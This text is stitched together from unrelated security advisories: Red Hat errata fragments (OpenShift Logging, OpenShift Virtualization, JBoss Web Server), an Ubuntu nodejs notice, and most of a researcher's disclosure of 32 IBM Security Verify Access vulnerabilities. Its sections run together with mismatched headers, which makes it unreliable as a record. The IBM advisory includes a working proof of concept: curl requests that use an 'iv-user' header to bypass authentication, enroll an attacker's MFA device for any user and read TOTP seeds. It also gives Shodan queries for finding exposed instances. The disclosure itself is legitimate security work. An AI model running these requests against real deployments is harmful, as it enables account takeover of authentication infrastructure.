[Vector] [OCP 4.11] SA token not added to Vector config when connecting to LokiStack instance without CLF creds secret required by LokiStack. LOG-2784 - Japanese log messages are garbled at Kibana LOG-2793 - [Vector] OVN audit logs are missing the level field. LOG-2864 - [vector] Can not sent logs to default when loki is the default output in CLF LOG-2867 - [fluentd] All logs are sent to application tenant when loki is used as default logstore in CLF. LOG-2873 - [Vector] Cannot configure CPU/Memory requests/limits when using Vector as collector. LOG-2875 - Seeing a black rectangle box on the graph in Logs view LOG-2876 - The link to the 'Container details' page on the 'Logs' screen throws error LOG-2877 - When there is no query entered, seeing error message on the Logs view LOG-2882 - RefreshIntervalDropdown and TimeRangeDropdown always set back to its original values when switching between pages in 'Logs' screen

References:

https://access.redhat.com/security/cve/CVE-2021-38561 https://access.redhat.com/security/cve/CVE-2022-0759 https://access.redhat.com/security/cve/CVE-2022-1012 https://access.redhat.com/security/cve/CVE-2022-1292 https://access.redhat.com/security/cve/CVE-2022-1586 https://access.redhat.com/security/cve/CVE-2022-1785 https://access.redhat.com/security/cve/CVE-2022-1897 https://access.redhat.com/security/cve/CVE-2022-1927 https://access.redhat.com/security/cve/CVE-2022-2068 https://access.redhat.com/security/cve/CVE-2022-2097 https://access.redhat.com/security/cve/CVE-2022-21698 https://access.redhat.com/security/cve/CVE-2022-30631 https://access.redhat.com/security/cve/CVE-2022-32250 https://access.redhat.com/security/updates/classification/#important

Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Red Hat OpenShift Virtualization release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements. Description:

OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.

RHEL-8-CNV-4.12

Bugs fixed (https://bugzilla.redhat.com/):

Description:

Red Hat JBoss Web Server is a fully integrated and certified set of components for hosting Java web applications. It is comprised of the Apache Tomcat Servlet container, JBoss HTTP Connector (mod_cluster), the PicketLink Vault extension for Apache Tomcat, and the Tomcat Native library. This release includes bug fixes, enhancements and component upgrades, which are documented in the Release Notes, linked to in the References.

The References section of this erratum contains a download link for the update. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.

Security Fix(es):

libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)
libxml2: dict corruption caused by entity reference cycles (CVE-2022-40304)
expat: a use-after-free in the doContent function in xmlparse.c (CVE-2022-40674)
zlib: a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field (CVE-2022-37434)
curl: HSTS bypass via IDN (CVE-2022-42916)
curl: HTTP proxy double-free (CVE-2022-42915)
curl: POST following PUT confusion (CVE-2022-32221)
httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism (CVE-2022-31813)
httpd: mod_sed: DoS vulnerability (CVE-2022-30522)
httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615)
httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614)
httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377)
curl: control code in cookie denial of service (CVE-2022-35252)
zlib: a heap-based buffer over-read or buffer overflow in inflate in inflate.c via a large gzip header extra field (CVE-2022-37434)
jbcs-httpd24-httpd: httpd: mod_isapi: out-of-bounds read (CVE-2022-28330)
curl: Unpreserved file permissions (CVE-2022-32207)
curl: various flaws (CVE-2022-32206 CVE-2022-32208)
openssl: the c_rehash script allows command injection (CVE-2022-2068)
openssl: c_rehash script allows command injection (CVE-2022-1292)
jbcs-httpd24-httpd: httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody (CVE-2022-22721)
jbcs-httpd24-httpd: httpd: mod_sed: Read/write beyond bounds (CVE-2022-23943)

2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds 2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody 2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection 2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling 2095000 - CVE-2022-28330 httpd: mod_isapi: out-of-bounds read 2095002 - CVE-2022-28614 httpd: Out-of-bounds read via ap_rwrite() 2095006 - CVE-2022-28615 httpd: Out-of-bounds read in ap_strcmp_match() 2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability 2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism 2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection 2099300 - CVE-2022-32206 curl: HTTP compression denial of service 2099305 - CVE-2022-32207 curl: Unpreserved file permissions 2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification 2116639 - CVE-2022-37434 zlib: heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field 2120718 - CVE-2022-35252 curl: control code in cookie denial of service 2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c 2135411 - CVE-2022-32221 curl: POST following PUT confusion 2135413 - CVE-2022-42915 curl: HTTP proxy double-free 2135416 - CVE-2022-42916 curl: HSTS bypass via IDN 2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE 2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles

========================================================================== Ubuntu Security Notice USN-6457-1 October 30, 2023

nodejs vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in Node.js.

Software Description: - nodejs: An open-source, cross-platform JavaScript runtime environment.

Details:

Tavis Ormandy discovered that Node.js incorrectly handled certain inputs. If a user or an automated system were tricked into opening a specially crafted input file, a remote attacker could possibly use this issue to cause a denial of service. (CVE-2022-0778)

Elison Niven discovered that Node.js incorrectly handled certain inputs. (CVE-2022-1292)

Chancen and Daniel Fiala discovered that Node.js incorrectly handled certain inputs. (CVE-2022-2068)

Alex Chernyakhovsky discovered that Node.js incorrectly handled certain inputs. (CVE-2022-2097)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 22.04 LTS: libnode-dev 12.22.9~dfsg-1ubuntu3.1 libnode72 12.22.9~dfsg-1ubuntu3.1 nodejs 12.22.9~dfsg-1ubuntu3.1 nodejs-doc 12.22.9~dfsg-1ubuntu3.1

In general, a standard system update will make all the necessary changes. Solution:

For OpenShift Container Platform 4.9 see the following documentation, which will be updated shortly, for detailed release notes:

https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html

For Red Hat OpenShift Logging 5.3, see the following instructions to apply this update:

https://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html

Bugs fixed (https://bugzilla.redhat.com/):

2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects 2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS 2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays

JIRA issues fixed (https://issues.jboss.org/):

LOG-3293 - log-file-metric-exporter container has not limits exhausting the resources of the node

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512

Advisory Information

Title: 32 vulnerabilities in IBM Security Verify Access Advisory URL: https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt Blog URL: https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html Date published: 2024-11-01 Vendors contacted: IBM Release mode: Released CVE: CVE-2022-2068, CVE-2023-30997, CVE-2023-30998, CVE-2023-31001, CVE-2023-31004, CVE-2023-31005, CVE-2023-31006, CVE-2023-32328, CVE-2023-32329, CVE-2023-32330, CVE-2023-38267, CVE-2023-38267, CVE-2023-38368, CVE-2023-38369, CVE-2023-38370, CVE-2023-43017, CVE-2024-25027, CVE-2024-35137, CVE-2024-35139, CVE-2024-35140, CVE-2024-35141, CVE-2024-35142

Product description

IBM Security Verify Access is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets. In addition to state-of-the-art security policy management, IBM Security Verify Access provides authentication, authorization, data security, and centralized resource management capabilities.

IBM Security Verify Access offers the following features:

Authentication

Provides a wide range of built-in authenticators and supports external authenticators.

Authorization

Provides permit and deny decisions for protected resources requests in the secure domain through the authorization API.

Data security and centralized resource management

Manages secure access to private internal network-based resources by using the public Internet's broad connectivity and ease of use with a corporate firewall system.

From https://www.ibm.com/docs/en/sva/10.0.8?topic=overview-introduction-security-verify-access

Vulnerability Summary

Vulnerable versions: IBM Security Verify Access < 10.0.8.

The summary of the vulnerabilities is as follows:

non-assigned CVE vulnerability - Authentication Bypass on IBM Security Verify Runtime
CVE-2024-25027 - Reuse of snapshot private keys
CVE-2023-30997 - Local Privilege Escalation using OpenLDAP
CVE-2023-30998 - Local Privilege Escalation using rpm
CVE-2023-38267, CVE-2024-35141, CVE-2024-35142 - Insecure setuid binaries and multiple Local Privilege Escalation in IBM codes 5.1. CVE-2023-38267 - Local Privilege Escalation using mesa_config - import of a new snapshot 5.2. CVE-2024-35141 - Local Privilege Escalation using mesa_config - command injections 5.3. CVE-2023-38267 - Local Privilege Escalation using mesa_cli - import of a new snapshot 5.4. CVE-2024-35142 - Local Privilege Escalation using mesa_cli - telnet escape shell
CVE-2023-43017 - PermitRootLogin set to yes
CVE-2024-35137 and CVE-2024-35139 - Lack of password for the cluster user
CVE-2023-38368 - Non-standard way of storing hashes and world-readable files containing hashes
CVE-2023-38369 - Hardcoded PKCS#12 files
CVE-2023-31001 - Incorrect permissions in verify-access-dsc (race condition and leak of private key
non-assigned CVE vulnerability - Insecure health_check.sh script in verify-access (race condition and leak of private key)
CVE-2024-35140 - Local Privilege Escalation due to insecure health_check.sh script in verify-access (insecure SSL, insecure files)
CVE-2024-35140 (duplicate?) - Local Privilege Escalation due to insecure health_check.sh script in verify-access-dsc (insecure SSL, insecure file)
CVE-2023-31004 - Remote Code Execution due to insecure download of snapshot in verify-access-dsc, verify-access-runtime and verify-access-wrp
CVE-2023-31005 - Lack of authentication in Postgres inside verify-access-runtime
CVE-2023-31006 - Null pointer dereference in dscd - Remote DoS against DSC instances
CVE-2023-32327 - XML External Entity (XXE) in dscd
CVE-2023-38370 - Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh)
non-assigned CVE vulnerability - Remote Code Execution due to insecure download of rpm in verify-access-runtime (/usr/sbin/install_java_liberty.sh)
CVE-2023-32328 - Remote Code Execution due to insecure Repository configuration
CVE-2023-32329 - Additional repository configuration (potential supply-chain attack)
non-assigned CVE vulnerability - Remote Code Execution due to insecure /usr/sbin/install_system.sh script in verify-access-runtime
CVE-2023-32330 - Remote Code Execution due to insecure reload script in verify-access-runtime
CVE-2023-32330 (duplicate?) - Remote Code Execution due to insecure reload script in verify-access-wrp
non-assigned CVE vulnerability - Hardcoded private key for IBM ISS (ibmcom/verify-access)
non-assigned CVE vulnerability - dcatool using an outdated OpenSSL library (ibmcom/verify-access)
non-assigned CVE vulnerability - iss-lum using an outdated OpenSSL library (ibmcom/verify-access) and hardcoded keys
non-assigned CVE vulnerability - Outdated "IBM Crypto for C" library
non-assigned CVE vulnerability - Webseald using outdated code with remotely exploitable vulnerabilities 30.1. Libmodsecurity.so - 1 non-assigned CVE vulnerability 30.2. libtivsec_yamlcpp.so - 4 CVEs 30.3. libtivsec_xml4c.so - outdated Xerces-C library
non-assigned CVE vulnerability - Outdated and untrusted CAs used in the Docker images
non-assigned CVE vulnerability - Lack of privilege separation in Docker instances

TL;DR: An attacker can compromise IBM Security Verify Access using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). IBM Security Verify Access is a SSO solution mainly used by banks, Fortune 500 companies and governmental entities.

Miscellaneous notes:

The vulnerabilities were found in October 2022 and were communicated to IBM at the beginning of 2023. They ultimately were patched at the end of June 2024 (after 18 months). Requiring 1.5 years to provide security patches for vulnerabilities found in a SSO solution does not appear to be in par with current cybersecurity risks and is quite worrying. Update: Following communications with IBM PSIRT in September 2024 regarding missing CVEs and the publication of this security advisory, it was confirmed that at least one vulnerability was not yet patched (a 2017 DoS in libinjection, no CVE).

The vulnerabilities were patched progressively in the 10.0.6, 10.0.7 and 10.0.8 versions. It is unclear if all the non-assigned CVE vulnerabilities have been patched but IBM confirmed that all the vulnerabilities were patched and then IBM closed all the corresponding tickets.

Other issues had been reported but ultimately were dismissed (e.g. hard-to-trigger crashes and I did not have any time left for this security assessment).

Communication with IBM was difficult since IBM closed the tickets used to track the vulnerabilities multiple times without releasing any security patches. The timeline provided at the later part of this advisory provides an overview of the interactions I have had with IBM. IBM PSIRT redirected queries to IBM support and IBM support provided extremely disappointing answers to vulnerabilities. When I went back to IBM PSIRT with these answers, IBM PSIRT refused them and provided opposite answers. Reporting vulnerabilities to IBM was also inefficient. When I asked IBM for missing CVEs in September 2024, IBM PSIRT confirmed that patches were missing. All the tickets were already closed in June 2024 by IBM and I previously received confirmation that all the vulnerabilities had been patched.

Security bulletins were mainly found by following @CVEnew (https://twitter.com/CVEnew) and I had to guess the patched vulnerabilities from the CVE descriptions. After some requests, thankfully, IBM sent me a list of CVEs corresponding to the vulnerabilities I reported.

It appears that some CVEs are still missing.

Finally, another CVE (CVE-2023-38371 - https://nvd.nist.gov/vuln/detail/CVE-2023-38371), not present in this advisory) was assigned by IBM but refers to an issue (V-[REDACTED] - Insecure SSLv3 connections to the DSC servers in the report sent to IBM) that was confirmed not to be a vulnerability by IBM and by me, after a second analysis. This CVE is likely to be revoked. Update: IBM confirmed in September 2024 that this CVE was bogus after I signaled IBM that this is an incorrect CVE.

Impacts

An attacker can compromise the entire authentication infrastructure based on IBM Security Verify Access (ISAM/ISVA appliances and IBM Docker images) using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). Regarding the threat model, it is worth noting that attackers must be able to MITM traffic or get access inside the LAN of the tested organizations to exploit these vulnerabilities.

When the IBM Security Verify Access (ISVA) runtime docker instance (a core component of this solution) is reachable over the network, an attacker can bypass the entire authentication and interact with this back-end instance as any user, providing a complete control over any user without authentication. The IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities and is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users (for example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn...). The back-end APIs provided by the IBM Security Verify Access runtime docker instance are vulnerable to an authentication bypass vulnerability. Since the back-end is fully reachable, this vulnerability allows an attacker to get persistence in a targeted infrastructure by enrolling malicious Multi-Factor Authenticators to any user, without authentication (e.g. an authenticator assigned to any user, protected by a PIN (or not) chosen by the threat actor). In an offensive scenario, an attacker will likely delete authenticators for admins and security team and enroll new authenticators corresponding to admin accounts and get full control over the infrastructure while locking out legit admins.

This vulnerability has not been patched and IBM recommends implementing network restrictions or using mutual TLS authentication and following best practices:

Note: If the runtime container is exposed on an external IP address there must be network restrictions in place to ensure that access is not allowed from untrusted clients, or the runtime must be configured to require mutual TLS authentication.

From https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1

And from https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters

And from https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications

Note that even with network restrictions, a low privileged user on a trusted machine can fully compromise the authentication solution, since the back-end used to manage the entire authentication infrastructure can be reached without authentication by sending a specific HTTP header. Network exposure of this back-end (e.g. with IPv6, from monitoring servers, from docker servers, from webseal servers [that must, by design, reach the authentication back-end], or using a SSRF vulnerability) means a full take over of the authentication infrastructure, which can be quite problematic for large organizations.

Recommendations

- Apply security patches.
- Use network segmentation to isolate the Security Verify Access (ISVA) Runtime Docker instance.
- Implement the optional authentication based on SSL certificates in the ISVA Runtime Docker instance (this functionality has been added in the latest ISVA release (10.0.8)).
- Flag any additional authenticator added to an account as suspicious.
- Review logs for any HTTP access from untrusted IPs to the Security Verify Access Runtime Docker instance.

Shodan provides a list of websites using this technology. For SOC teams, I suggest using Shodan to check if your organization is using IBM Security Verify Access and following IBM's security recommendations. Please note that due to the versatility of this solution, it is very difficult to correctly detect affected installations using a blackbox approach:

- https://www.shodan.io/search?query=http.favicon.hash%3A-2069014068, 1,740 results as of October 30, 2024
- https://www.shodan.io/search?query=webseal, 1,083 results as of October 30, 2024
- https://www.shodan.io/search?query=CP%3D%22NON+CUR+OTPi+OUR+NOR+UNI%22, 6,673 results as of October 30, 2024

Details - Authentication Bypass on IBM Security Verify Runtime

It is possible to compromise the authentication mechanism and the authentication infrastructure by reaching the APIs provided by the IBM Security Verify Runtime Docker instance.

The threat model for this vulnerability requires an attacker with network connectivity to the IBM Security Verify Runtime Docker instance (i) from the Internet (if this service is insecurely exposed) or (ii) more likely from within LAN of the audited organization (meaning the threat actor can reach the HTTPS server of IBM Security Verify Runtime Docker instance).

The IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities. It is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users. For example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn...

The different authentication mechanisms in the APIs provided by the Runtime Docker instance used to manage users (e.g. adding an authenticator for a specific user, removing an authenticator, getting seeds, ...) can be trivially bypassed by specifying an additional HTTP header iv-user: target-user (e.g. iv-user: admin) in the HTTPS requests.

Adding an additional HTTP header iv-user: target-user when querying the APIs will provide a complete control over the target-user.

There is a HTTPs server reachable on port 443/tcp providing APIs:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Usually, the IBM Security Verify Runtime Docker instance is only reached by WebSEAL servers (reverse-proxies managing authentication), after a successful authentication as easuser, as shown below:

Documentation from https://www.ibm.com/docs/SSPREK_10.0.0/com.ibm.isva.doc/config/reference/ref_isamcfg_wga_worksheet.htm:

Select the method for authentication between WebSEAL and the Advanced Access Control runtime listening interface

Certificate authentication

Use a certificate to authenticate between WebSEAL and the Advanced Access Control runtime listening interface.

User ID and password authentication

Use credentials to authenticate between WebSEAL and the Advanced Access Control runtime listening interface. The default username is easuser and the default password is passw0rd.

Attack scenario: an attacker will reach the HTTPS APIs provided by the IBM Security Verify Runtime Docker instance and will not use a SSL Certificate or any credential used to manage the instance (easuser).

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Note that while the WebSEAL are exposed to the Internet, the runtime instance is located inside the LAN and is not usually exposed to the Internet. The attacker needs to be located inside the LAN to reach the vulnerable APIs.

According to the documentation at https://www.ibm.com/docs/en/sva/10.0.7, we can see that the APIs are always reachable using the /mga/sps/* path. Actually, the /mga/ route seems to be managed by WebSEAL servers while the /sps/* routes are managed by the runtime docker instance.

Without authentication, an attacker can reach the IBM Security Verify Runtime Docker image docker instance by reaching, for example, the /sps/oauth/oauth20/authorize?client_id=ClientID&response_type=code&scope=mmfaAuthn API endpoint and specifying which target user to compromise using the additional HTTP header iv-user: target-user. This specific endpoint is used to enroll a new Multiple-Factor Authenticator (e.g. the official IBM Security Verify app (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp&hl=en) for the target-user user.

By specifying the HTTP header iv-user: target-user, an attacker can interact with all the APIs located in /sps/* for any user, without authentication.

Listing of authenticators without any cookie or HTTP header - this non-intrusive request allows detecting a vulnerable IBM Security Verify Runtime Docker instance configured to use MFA.

kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators | jq . 
{
  "result": "FBTRBA306E The user management operation failed because the user is not authenticated."
}

Listing of authenticators for the target-user - with iv-user HTTP header (without session cookies nor specific credentials):

kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators -H "iv-user: target-user" | jq . 
[
  {
    "device_name": "Iphone 13 Pro Max",
    "oauth_grant": "uuida71[REDACTED]",
    "auth_methods": [],
    "os_version": "13",
    "device_type": "[REDACTED]",
    "id": "uuid20[REDACTED]",
    "enabled": true
  },
  {
    "device_name": "Iphone 13 Pro Max",
    "oauth_grant": "uuida71[REDACTED]",
    "auth_methods": [],
    "os_version": "13",
    "device_type": "[REDACTED]",
    "id": "uuid20[REDACTED]",
    "enabled": true
  },
[...]
kali%

It is possible to enroll any new authenticator for the user target without authentication by reaching the IBM Security Verify Runtime instance and specifying iv-user: target-user in the HTTP header:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

A PoC is provided below. The provided secret code allows enrolling a new authenticator for the target user target-user. Note that the client_id variable must be edited as we use the specific TestAuthenticatorClient client identifier. The valid client_id variable can be retrieved from the /sps/mga/user/mgmt/grant API:

kali% curl -kv -H "iv-user: target-user" https://test-runtime/sps/mga/user/mgmt/grant | jq . 
{
  "grants": [
    {
      "id": "uuida71[REDACTED]",
      "isEnabled": true,
      "clientId": "TestAuthenticatorClient",
[...]

I suggest using the specific client_id identifier configured in the targeted instance. The correct client_id identifier can also be obtained by visiting https://test-runtime/sps/mga/user/mgmt/html/device/device_selection.html. The device_selection.html webpage is just a front-end to get access to several APIs:

- /sps/mga/user/mgmt/grant
- /sps/mmfa/user/mgmt/authenticators
- /sps/fido2/registrations
- /sps/mga/user/mgmt/device
- /sps/apiauthsvc/policy/u2f_register
- /sps/mga/user/mgmt/clients
- ...

For example, visiting a remote IBM Security Verify Runtime instance athttps://url/sps/mga/user/mgmt/html/device/device_selection.html without an iv-user: target-user HTTP header will return empty information (since the resulting requests sent to APIs are not "authenticated"):

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

Visiting the same address https://url/sps/mga/user/mgmt/html/device/device_selection.html using Burp Suite Pro, and (i) adding a HTTP Header iv-user: target-user in all the resulting HTTP requests and (ii) rewriting the URL from ^\/mga\/sps\/ to \/sps\/ (since the /mga/ path is hardcoded in JavaScript code) will now provide a full access for the target-user (adding an authenticator, deleting an authenticator, adding passkeys, ...).

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

An attacker can also add an new authenticator for any user using curl:

PoC:

kali% curl -kv "https://test-runtime/sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient&response_type=code&scope=mmfaAuthn" -H "iv-user: target-user"          
* Host test-runtime:443 was resolved. 
* IPv6: (none)
* IPv4: 10.0.0.15
*   Trying 10.0.0.15:443... 
* Connected to test-runtime (10.0.0.15) port 443
* using HTTP/1.x
> GET /sps/oauth/oauth20/authorize?client_id=TestAuthenticatorClient&response_type=code&scope=mmfaAuthn HTTP/1.1
> Host: test-runtime
> User-Agent: curl/8.5.0
> Accept: */*
> iv-user: target-user
> 
< HTTP/1.1 302 Found
< X-Frame-Options: SAMEORIGIN
< Pragma: no-cache
< Location: https://enroll-url/mga/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=TestAuthenticatorClient&code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y
< Content-Language: en-US
< Transfer-Encoding: chunked
< Date: Sat, 07 Sep 2024 12:07:21 GMT
< Expires: Thu, 01 Dec 1994 16:00:00 GMT
< Cache-Control: no-store, no-cache=set-cookie
< 
* Connection #0 to host test-runtime left intact

The resulting secret code provided in the HTTP answer can be used to enroll an official IBM Security Verify application (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp&hl=en) corresponding to the target-user.

In order to import this secret token inside an IBM Verify Security application (an authenticator), we can:

- reach the https://test-runtime/sps/mmfa/user/mgmt/html/mmfa/qr_code.html?client_id=TestAuthenticatorClient&code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y webpage (without /mga at the beginning of the URL) and scan the generated QR code; Burp Suite Pro is required to replace all the API calls from /mga/sps/ to /sps/; or

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

- reach the /sps/mmfa/user/mgmt/qr_code/json API to get the json encoded data inside the QR code (using ?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y&client_id=TestAuthenticatorClient) and generate the QR code (note that in the next HTTP answer, the ignoreSslCerts=true is not the default option); or

GET /sps/mmfa/user/mgmt/qr_code/json?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y&client_id=TestAuthenticatorClient HTTP/1.1
Host: test-runtime
iv-user: target-user
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close


HTTP/1.1 200 OK
Content-Type: application/json
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Content-Language: en-US
Connection: Close
Date: Sat, 07 Sep 2024 20:39:55 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-store, no-cache=set-cookie
Content-Length: 202

{"code":"0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y","options":"ignoreSslCerts=true",
"details_url":"https:\/\/enroll-url\/mga\/sps\/mmfa\/user\/mgmt\/details",
"version":1,"client_id":"TestAuthenticatorClient"}

- reach the /mga/sps/mmfa/user/mgmt/qr_code/json API (provided by any targeted WebSEAL servers from the same infrastructure, including Internet-faced WebSEAL servers) to get the json encoded data inside the QR code (using ?code=0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y&client_id=TestAuthenticatorClient) and generate the QR code; or
- simply locally generate the QR code containing the JSON data as shown below using the qrencode program:

    kali% qrencode -o picture.png '{"code":"0nXkRywNfZkCoA5WFtZqDk5mKJPV9Y","options":"ignoreSslCerts=false","details_url":"https:\/\/enroll-url\/mga\/sps\/mmfa\/user\/mgmt\/details","version":1,"client_id":"TestAuthenticatorClient"}'

Then the QR code needs to be scanned using the official IBM Verify Security App (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp&hl=en) in order to enroll a new device. By default, the specific https://enroll-url/mga/sps/mmfa/user/mgmt/details is always reachable from the Internet in order to successfully enroll smartphones.

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

The official IBM Security Verify application (https://play.google.com/store/apps/details?id=com.ibm.security.verifyapp&hl=en) has been used and successfully enrolled for the target-user and can now be used to authenticate as target-user:

[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]

The device has been correctly enrolled from the Internet as shown below, by using the /sps/mmfa/user/mgmt/authenticators API without authentication.

kali% curl -ks https://test-runtime/sps/mmfa/user/mgmt/authenticators -H "iv-user: target-user" | jq . 
[
  {
    "device_name": "Samsung S22",
    "oauth_grant": "uuida72253ef[REDACTED]",
    "auth_methods": [
      {
        "key_handle": "32e[REDACTED].userPresence",
        "id": "uuidb694[REDACTED]",
        "type": "user_presence",
        "enabled": true,
        "algorithm": "SHA256withRSA"
      }
    ],
    "os_version": "13",
    "device_type": "[REMOVED]",
    "id": "uuidb4fde[REDACTED]",
    "enabled": true
  },
[...]

Furthermore, all the APIs in /sps/* are directly reachable by specifying the HTTP header iv-user: target-user.

We can also list the secret key for the seed corresponding to OTP:

kali% curl -ks https://test-runtime/sps/mga/user/mgmt/otp/totp -H "iv-user: target-user" | jq .          
{                                  
  "period": "30",
  "secretKeyUrl": "otpauth://totp/Example:target-user"?secret=NSJ[REDACTED][REDACTED][REDACTED]&issuer=Example",
  "secretKey": "NSJ[REDACTED][REDACTED][REDACTED]",
  "digits": "6",
  "username": "target-user",
  "algorithm": "HmacSHA1"
}

All the APIs located in /sps/ are vulnerable to this authentication bypass.

As shown previously, it is possible to bypass the entire authentication and interact with the IBM Security Verify runtime docker instance as any user.

An attacker can enroll a device for any user, bypassing the entire access controls, and get control over the infrastructure. Since the back-end is fully reachable, an attacker can also delete any authenticator for any user.

At the time of the security assessment (October 2022), I was not able to find any official documentation that recommends not exposing the runtime instance to the network, since the runtime APIs are password protected.

The latest ISVA release (10.0.8) implements an optional authentication based on SSL certificates. It is strongly recommended to implement this authentication mechanism and not to expose the ISVA runtime instance to the network.

Without this optional authentication, any malicous actor (i) with access to WebSEAL servers (with a shell or a SSRF vulnerability) or (ii) with direct network access to the runtime instance, or (iii) with a shell access to any 'trusted' machine (e.g. a monitoring server querying the HTTPS server of ISVA runtime), or (iv) with a low-privilege shell on the docker server running the solution, can completely compromise the authentication infrastructure, without credentials.

Regarding the official recommendations, IBM recommends (i) not to expose the runtime instance to untrusted clients or (ii) to implement SSL-based certificate authentication and follow the following best practices. IBM provided these references as official responses regarding this issue:

- From https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1;
- And https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters;
- And https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications:

Note: If the runtime container is exposed on an external IP address there must be network restrictions in place to ensure that access is not allowed from untrusted clients, or the runtime must be configured to require mutual TLS authentication.

From my understanding, this vulnerability is not going to be patched (no security bulletin was published and no CVE has been assigned, ticket has been closed as solved) because, according to the official recommendations, it is the customer's responsability to filter any communication to the runtime instance. This present security advisory will allow offensive and defensive security teams to correctly understand and improve their security posture.

About the detection of insecure instances, a HTTPS request to the /sps/ route providing the banner Server: IBM Security Verify Access in the HTTPS answer will allow SOC team to detect an instance. The banner will not appear when reaching https://test-runtime/). If MFA is used, a HTTP request to /sps/mga/user/mgmt/html/device/device_selection.html (port 443 or 9443, by default) will allow SOC team to detect an insecure ISVA runtime instance. An answer indicating 200 OK with the content of the device_selection.html webpage will indicate that the tested instance is probably insecure:

